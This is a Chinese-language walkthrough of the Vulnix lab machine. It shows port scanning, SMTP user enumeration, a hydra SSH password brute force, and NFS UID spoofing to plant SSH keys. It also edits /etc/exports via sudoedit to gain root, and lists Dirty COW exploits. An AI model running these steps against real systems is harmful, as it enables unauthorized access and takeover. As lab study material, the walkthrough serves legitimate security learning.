0x01 偵查
找尋靶機IP
└─$ nmap -sP 192.168.44.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 09:55 CST
Nmap scan report for 192.168.44.129
Host is up (0.00088s latency).
Nmap scan report for 192.168.44.230
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 75.43 seconds
偵查靶機開的port
└─$ sudo nmap -sS -sV -T4 -A -p- 192.168.44.230
[sudo] password for nathan:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 09:58 CST
Nmap scan report for 192.168.44.230
Host is up (0.00073s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_ 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp open smtp Postfix smtpd
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix
| Not valid before: 2012-09-02T17:40:12
|_Not valid after: 2022-08-31T17:40:12
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
79/tcp open finger Linux fingerd
|_finger: No one logged on.\x0D
110/tcp open pop3?
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
|_pop3-capabilities: STLS CAPA SASL UIDL TOP RESP-CODES PIPELINING
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 39367/tcp6 mountd
| 100005 1,2,3 50406/tcp mountd
| 100005 1,2,3 52541/udp mountd
| 100005 1,2,3 52651/udp6 mountd
| 100021 1,3,4 41141/tcp nlockmgr
| 100021 1,3,4 45141/udp6 nlockmgr
| 100021 1,3,4 50156/udp nlockmgr
| 100021 1,3,4 53587/tcp6 nlockmgr
| 100024 1 46920/tcp status
| 100024 1 51756/tcp6 status
| 100024 1 52813/udp status
| 100024 1 53709/udp6 status
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS more have ID LITERAL+ listed capabilities Pre-login IDLE post-login SASL-IR LOGINDISABLEDA0001 OK STARTTLS IMAP4rev1 ENABLE
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
|_imap-capabilities: LOGIN-REFERRALS more ID have Pre-login listed SASL-IR IDLE post-login AUTH=PLAINA0001 capabilities OK ENABLE IMAP4rev1 LITERAL+
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
995/tcp open ssl/pop3s?
|_ssl-date: 2022-11-19T02:01:58+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server
| Not valid before: 2012-09-02T17:40:22
|_Not valid after: 2022-09-02T17:40:22
|_pop3-capabilities: CAPA SASL(PLAIN) TOP UIDL USER RESP-CODES PIPELINING
2049/tcp open nfs_acl 2-3 (RPC #100227)
40909/tcp open mountd 1-3 (RPC #100005)
41141/tcp open nlockmgr 1-4 (RPC #100021)
42577/tcp open mountd 1-3 (RPC #100005)
46920/tcp open status 1 (RPC #100024)
50406/tcp open mountd 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/19%OT=22%CT=1%CU=35710%PV=Y%DS=2%DC=T%G=Y%TM=637839
OS:14%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW3%O2=M5B4ST11NW3%O3=M5B4NNT11NW3%O4=M5B4ST11NW3%O5=M5B4ST
OS:11NW3%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)EC
OS:N(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6979%RUD=G)IE(R=Y%DFI=N%T=4
OS:0%CD=S)
Network Distance: 2 hops
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 0.20 ms DESKTOP-NRNV04H.mshome.net (172.23.32.1)
2 0.81 ms 192.168.44.230
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.88 seconds
Segmentation fault
0x02 Get Shell
這一次沒有80 port,不過有開25 port,SMTP(Simple Mail Transfer Protocol)。可以透過枚舉工具來情蒐,得到帳號:
- VRFY 用以確認使用者名稱
- EXPN 電子郵件列表
- RCPT TO 收件者
不過枚舉工具smtp-user-enum好像沒有預先安裝,所以先安裝一下:
└─$ pip install smtp-user-enum
Defaulting to user installation because normal site-packages is not writeable
Collecting smtp-user-enum
Downloading smtp_user_enum-0.5.0-py2.py3-none-any.whl (12 kB)
Collecting argparse
Downloading argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Installing collected packages: argparse, smtp-user-enum
Successfully installed argparse-1.4.0 smtp-user-enum-0.5.0
- -M 用户名猜测EXPN、VRFY或RCPT的方法(默认为VRFY)
- -U 通过smtp服务检查的用户名文件
- -t 服务器运行smtp服务的主机
-U後面要接字典檔:
└─$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/namelist.txt -t 192.168.44.230
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/metasploit/namelist.txt
Target count ............. 1
Username count ........... 1909
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Sat Nov 19 10:46:18 2022 #########
192.168.44.230: backup exists
192.168.44.230: games exists
192.168.44.230: irc exists
192.168.44.230: mail exists
192.168.44.230: news exists
192.168.44.230: proxy exists
192.168.44.230: root exists
192.168.44.230: syslog exists
192.168.44.230: user exists
######## Scan completed at Sat Nov 19 10:46:25 2022 #########
9 results.
1909 queries in 7 seconds (272.7 queries / sec)
目前得到的帳號有backup、games、irc、mail、news、proxy、root、syslog、user等。要如何拿到密碼?
首先用finger來查登入資訊(這步是否必要?)。finger用于查找并显示用户信息,包括本地与远端主机的用户皆可,帐号名称没有大小写的差别。单独执行finger指令,它会显示本地主机现在所有的用户的登陆信息,包括帐号名称,真实姓名,登入终端机,闲置时间,登入时间以及地址和电话。
└─$ finger user@192.168.44.230
Login: user Name: user
Directory: /home/user Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Login: dovenull Name: Dovecot login user
Directory: /nonexistent Shell: /bin/false
Never logged in.
No mail.
No Plan.
接下來使用hydra作ssh密碼爆破。有別於先前體驗過的其他工具,雖然也是透過字典檔的形式,但它支援多種不同協定,可以用來破解ssh、telnet、ftp等等,使用範例如下
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
範例裡用到的相關參數如下:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
通常是用-L給定Login name的列表(txt檔),然後搭配密碼字典檔來使用,不過現在只先對user做密碼爆破,所以直接打使用者名稱即可。用-t對靶機一次建立n個連線,來測試hydra能不能找到帳密來登入ssh服務。
└─$ hydra -l user -P /usr/share/wordlists/rockyou.txt -t 6 ssh://192.168.44.230
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-19 13:57:54
[DATA] max 6 tasks per 1 server, overall 6 tasks, 14344399 login tries (l:1/p:14344399), ~2390734 tries per task
[DATA] attacking ssh://192.168.44.230:22/
[STATUS] 66.00 tries/min, 66 tries in 00:01h, 14344333 to do in 3622:19h, 6 active
[STATUS] 51.00 tries/min, 153 tries in 00:03h, 14344246 to do in 4687:40h, 6 active
[STATUS] 43.71 tries/min, 306 tries in 00:07h, 14344093 to do in 5468:53h, 6 active
[22][ssh] host: 192.168.44.230 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-19 14:09:56
這裡選的字典檔是/usr/share/wordlists/rockyou.txt,也可以選/usr/share/wordlists/metasploit/password.lst,但是破解時間太長了。
來ssh登入:
└─$ ssh user@192.168.44.230
The authenticity of host '192.168.44.230 (192.168.44.230)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.230' (ECDSA) to the list of known hosts.
user@192.168.44.230's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Nov 19 06:18:19 GMT 2022
System load: 0.02 Processes: 90
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.44.230
Swap usage: 0%
=> / is using 90.4% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
user@vulnix:~$
接下來翻翻看有沒有什麼值得提權的。
來看看nfs
└─$ showmount -e 192.168.44.230
Export list for 192.168.44.230:
/home/vulnix *
這代表靶机将vulnix用户的家目录共享,所以我們掛載。
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/nfs
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.44.230:/home/vulnix /mnt/nfs
┌──(kali㉿kali)-[~]
└─$ cd /mnt
┌──(kali㉿kali)-[/mnt]
└─$ cd nfs
cd: permission denied: nfs
┌──(kali㉿kali)-[/mnt]
└─$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Nov 19 03:20 .
drwxr-xr-x 18 root root 4096 Aug 8 06:57 ..
drwxr-x--- 2 nobody nogroup 4096 Sep 2 2012 nfs
要注意,上面的指令只能在虛擬機有用,在wsl2沒有用。可以發現雖然掛載了,但進不去,估计设置了root_squash。
- no_root_squash:登入 NFS 主机使用分享目录的使用者,如果是 root 的话,那么对于这个分享的目录来说,他就具有 root 的权限。
- root_squash:在登入 NFS 主机使用分享目录的使用者如果是 root 时,那么这个使用者的权限将被压缩成为匿名使用者,通常他的 UID 与 GID 都会变成 nobody 那个系统账号的身份。
現在可能沒辦法把root_squash改成no_root_squash,但既然掛載的是vulnix的家目錄,那麼在攻擊機創建一個使用者名稱、uid、gid一樣的使用者,再用這使用者的身分登入就好。
那我們要查vulnix的uid跟gid是多少,首先要先用剛剛得到的user帳密ssh登入,再看看/etc/passwd。
─$ ssh user@192.168.44.230
The authenticity of host '192.168.44.230 (192.168.44.230)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.230' (ECDSA) to the list of known hosts.
user@192.168.44.230's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Nov 19 16:40:53 GMT 2022
System load: 0.0 Processes: 89
Usage of /: 84.7% of 773MB Users logged in: 0
Memory usage: 9% IP address for eth0: 192.168.44.230
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sat Nov 19 06:18:19 2022 from 192.168.44.1
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
查到uid跟gid都是2008,接下來在攻擊機上創建一樣的帳號:
┌──(kali㉿kali)-[/mnt]
└─$ sudo groupadd -g 2008 vulnix
[sudo] password for kali:
┌──(kali㉿kali)-[/mnt]
└─$ sudo adduser vulnix -uid=2008 -gid=2008
Adding user `vulnix' ...
Adding new user `vulnix' (2008) with group `vulnix' ...
Creating home directory `/home/vulnix' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
No password has been supplied.
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for vulnix
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
me Phone []:
Other []:
Is the information correct? [Y/n] Y
接下來把帳號切換到vulnix,移動到nfs目錄,再查看裡面有什麼檔案:
┌──(kali㉿kali)-[/mnt]
└─$ su - vulnix
Password:
┌──(vulnix㉿kali)-[~]
└─$ cd /mnt/nfs
┌──(vulnix㉿kali)-[/mnt/nfs]
└─$ ls -la
total 20
drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 .
drwxr-xr-x 3 root root 4096 Nov 19 03:20 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
進入後只有一些普通的共通文件,這裡一個神奇操作來了: 在nfs內創建ssh密鑰,這樣就可以從我們創建的假帳號,變成靶機內的vulnix真帳號!
┌──(kali㉿kali)-[/mnt]
└─$ sudo passwd root
[sudo] password for kali:
New password:
Retype new password:
passwd: password updated successfully
┌──(kali㉿kali)-[/mnt]
└─$ su
Password:
┌──(root㉿kali)-[/mnt]
└─# cd
┌──(root㉿kali)-[~]
└─# pwd
/root
┌──(root㉿kali)-[~]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:XYggyHFUzP276r4usW0H63whDKf4ZJVMWuv1BqTLkJI root@kali
The key's randomart image is:
+---[RSA 3072]----+
| ..+++o. |
| o. .o.+... |
| . *.*. . |
| E = B.+. |
| o XSo.+ |
| . = B o o |
| + + + + |
| +.+ + |
| BO= |
+----[SHA256]-----+
┌──(root㉿kali)-[~]
└─# pwd
/root
┌──(root㉿kali)-[~]
└─# cd /root/.ssh
┌──(root㉿kali)-[~/.ssh]
└─# ls
id_rsa id_rsa.pub
┌──(root㉿kali)-[~/.ssh]
└─# cp id_rsa.pub /mnt
┌──(root㉿kali)-[~/.ssh]
└─# exit
┌──(kali㉿kali)-[/mnt]
└─$ su - vulnix
Password:
┌──(vulnix㉿kali)-[~]
└─$ cd /mnt
┌──(vulnix㉿kali)-[/mnt]
└─$ ls
id_rsa.pub nfs
┌──(vulnix㉿kali)-[/mnt]
└─$ mkdir /mnt/nfs/.ssh
mkdir: cannot create directory ‘/mnt/nfs/.ssh’: File exists
┌──(vulnix㉿kali)-[/mnt]
└─$ cd nfs/.ssh
┌──(vulnix㉿kali)-[/mnt/nfs/.ssh]
└─$ cp /mnt/id_rsa.pub authorized_keys
┌──(vulnix㉿kali)-[/mnt/nfs/.ssh]
└─$ ls
authorized_keys
先創建root帳號的密碼,登入root後下ssh-keygen指令,生成密鑰id_rsa.pub。比較要注意的是,要把生成的密鑰先用root權限移到vulnix權限也能存取的地方,再由vulnix移到nfs底下的.ssh。
接下來就是登入:
┌──(kali㉿kali)-[~/.ssh]
└─$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa vulnix@192.168.44.230
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Nov 20 10:00:26 GMT 2022
System load: 0.0 Processes: 88
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.44.230
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
vulnix@vulnix:~$
要特別注意的,就是ssh時的這個參數:
-o 'PubkeyAcceptedKeyTypes +ssh-rsa'
沒有這個參數,根本就無法無密碼登入。However, as with creating the key, we need to tell our SSH client to accept the old ssh-rsa algorithm.
0x03 提權
vulnix@vulnix:~$ sudo -ll
Matching 'Defaults' entries for vulnix on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
Sudoers entry:
RunAsUsers: root
Commands:
sudoedit /etc/exports
RunAsUsers: root
Commands:
NOPASSWD: sudoedit /etc/export
可以從sudo -ll知道可以不須帳密就可編輯export文件
vulnix@vulnix:~$ sudoedit /etc/exports
原本文件只有/home/vulnix,直接多加root作為可共享目錄
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
/root *(rw,no_root_squash)
接下來重開靶機後,再次看共用目錄,可以發現有共享root
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.44.230
Export list for 192.168.44.230:
/root *
/home/vulnix *
所以創建一個目錄,把root掛載在上面:
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.44.230:/root /mnt/vulnroot
掛載以後就可以故技重施,製作ssh的公鑰私鑰:
┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t ssh-rsa
Generating public/private ssh-rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): root_key
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in root_key
Your public key has been saved in root_key.pub
The key fingerprint is:
SHA256:WYQn4+8RkXF9595AiJu2c/0oRvda8tA+YrSnxvHKZAo kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o+.o |
| +.=.. o o|
| . +.+ . o.|
| .o= . .|
| So o . o.|
| = ooo.o|
| E =o+*+o|
| o B*.Xo|
| oo=*.+|
+----[SHA256]-----+
創建.ssh資料夾,把公鑰放在裡面,並改名authorized_keys。
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/vulnroot/.ssh
┌──(kali㉿kali)-[~]
└─$ sudo cp .ssh/root_key.pub /mnt/vulnroot/.ssh/authorized_keys
接下來就可以不用帳密登入root帳號,完成提權。
┌──(kali㉿kali)-[~]
└─$ cd .ssh
┌──(kali㉿kali)-[~/.ssh]
└─$ ls -al
total 32
drwx------ 2 kali kali 4096 Nov 20 05:40 .
drwxr-xr-x 22 kali kali 4096 Nov 20 05:59 ..
-rw------- 1 kali kali 2590 Nov 20 03:13 id_rsa
-rw-r--r-- 1 kali kali 222 Nov 19 20:33 known_hosts
-rw------- 1 kali kali 2590 Nov 20 05:40 root_key
-rw-r--r-- 1 kali kali 563 Nov 20 05:40 root_key.pub
-rw------- 1 kali kali 2590 Nov 20 04:55 y
-rw-r--r-- 1 kali kali 563 Nov 20 04:55 y.pub
┌──(kali㉿kali)-[~/.ssh]
└─$ sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i root_key root@192.168.44.230
[sudo] password for kali:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Nov 20 11:02:05 GMT 2022
System load: 0.02 Processes: 93
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.44.230
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Nov 20 10:43:21 2022 from 192.168.44.129
root@vulnix:~# ls -al
total 32
drwx------ 4 root root 4096 Nov 20 10:36 .
drwxr-xr-x 22 root root 4096 Sep 2 2012 ..
-rw------- 1 root root 0 Sep 2 2012 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwx------ 2 root root 4096 Sep 2 2012 .cache
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwxr-xr-x 2 root root 4096 Nov 20 10:42 .ssh
-r-------- 1 root root 33 Sep 2 2012 trophy.txt
-rw------- 1 root root 710 Sep 2 2012 .viminfo
root@vulnix:~# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
0x03' 提權(2)
有一個叫dirty cow的弱點應該可以用:
└─$ searchsploit 3.9
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
...一大堆
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service | linux/dos/19818.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privi | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escal | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Es | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access M | linux/local/40611.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux modutils 2.3.9 - 'modprobe' Arbitrary Command Execution | linux/local/20402.sh
...一大堆
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Reference
VulnHub-HACKLAB: VULNIX-靶机渗透学习
Vulnix Walkthrough (OSCP Prep)
GitHub - vshaliii/Hacklab-Vulnix: CTF machine Writeup
Day 23 Password Attacks - 密碼攻擊 (hydra, pw-inspector) - iT 邦幫忙::一起幫忙解決難題,拯救 IT 人的一天
_@humorless_https://static.coderbridge.com/img/humorless/7715ea00f5b149dab93984b06bef1c8d.png)
